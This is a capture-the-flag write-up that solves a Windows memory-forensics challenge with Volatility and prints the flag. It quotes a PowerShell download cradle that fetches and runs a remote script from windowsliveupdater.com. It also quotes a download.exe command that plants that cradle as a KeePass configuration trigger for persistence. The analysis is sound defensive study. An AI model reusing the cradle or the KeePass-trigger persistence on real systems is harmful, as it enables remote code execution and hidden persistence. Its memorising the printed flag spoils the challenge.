Steam Door
Steam-security analysts have spotted a new, unknown persistence technique used in the wild. But they are not able to understand how it works, since steam technology is evolving at a very fast rate. Please analyse this memory dump and find the persistence mechanism used by the malicious steam actors.
Flag format: HTB{md5sum }. For example: HTB{55e7dd3016ce4ac57b9a0f56af12f7c2}
Download: drive.google.com/file/d/1OP_r3c9Crvym28suH9K7ro5JNN0Pzx5_
Category: Forensics
Solver: lmarschk, mp455
Flag: HTB{db042f659831045cc3748324b481507e}
Writeup
Summary: Analysis of a Windows memory dump and extraction of a file from it.
We got a memory dump, steam.raw. Using Volatility 2.6.1 we analyse the memory in multiple directions. For example:
- imageinfo: Windows profile Win7SP1x86_23418
- pstree:

  Name                           Pid   PPid  Thds  Hnds  Time
  ----------------------------- ------ ------ ----- ----- ----
  . 0x85169698:KeePass.exe        2756   3344    10   229  2022-03-01 12:17:23 UTC+0000
  .. 0x85b31358:powershell.exe     188   2756    13   335  2022-03-01 12:17:34 UTC+0000

- cmdline -p 188:

  Command line : "C:\windows\system32\Windowspowershell\v1.0\powershell.exe" -c iex (new-object net.webclient).downloadstring('https://windowsliveupdater.com/backup.ps1')

- cmdscan:

  Cmd #0 @ 0x257f78: dir downloads
  Cmd #1 @ 0x257fa0: cd downloads
  Cmd #2 @ 0x264680: .\download.exe -t keepass -c "C:\windows\system32\Windowspowershell\v1.0\powershell.exe" -a "-c iex (new-object net.webclient).downloadstring('https://windowsliveupdater.com/backup.ps1')" -f C:\Users\steam_mngr\AppData\Roaming\KeePass\KeePass.config.xml -m add
This information already tells us a story. At some point in the past someone executed download.exe with a command (-c), its argument (-a), a KeePass config file (-f), a mode (-m add) and a type (-t keepass). At the time of the memory dump, KeePass (PID 2756) was running with a powershell child process (PID 188, PPid 2756) that is executing exactly the argument given as -a. From this we can reconstruct the likely sequence: an attacker had access to this computer, downloaded the tool download.exe and ran it in its keepass mode so that the powershell command from -a was written into KeePass.config.xml. KeePass supports triggers in its configuration file: a trigger runs a configured action, including an arbitrary command line, when an event such as the application starting or a database being opened fires. That is the persistence mechanism here: no Run key, scheduled task or service is needed, only a modified per-user XML file under AppData\Roaming, and the download cradle is re-executed every time the user starts KeePass.
As we cannot find further information about backup.ps1 (the command line fetches it with downloadstring and hands it straight to iex, so the script itself is never written to disk by that step), let's try to find KeePass.config.xml instead. While Volatility's dumpfiles plugin cannot find the file by default, the filescan plugin can:

0x000000003ef7ed58 8 0 R--r-- \Device\HarddiskVolume1\Users\steam_mngr\AppData\Roaming\KeePass\KeePass.config.xml

With this physical offset, dumpfiles can dump the file via dumpfiles -Q 0x000000003ef7ed58. This way we get the manipulated KeePass config file and find a trigger section containing the powershell payload. We can now calculate the md5sum of the dumped config file (do not remove any of the many null bytes at the end of the file: dumpfiles writes out whole memory pages, and the flag is the hash of the padded file exactly as dumped) and get the flag: HTB{db042f659831045cc3748324b481507e}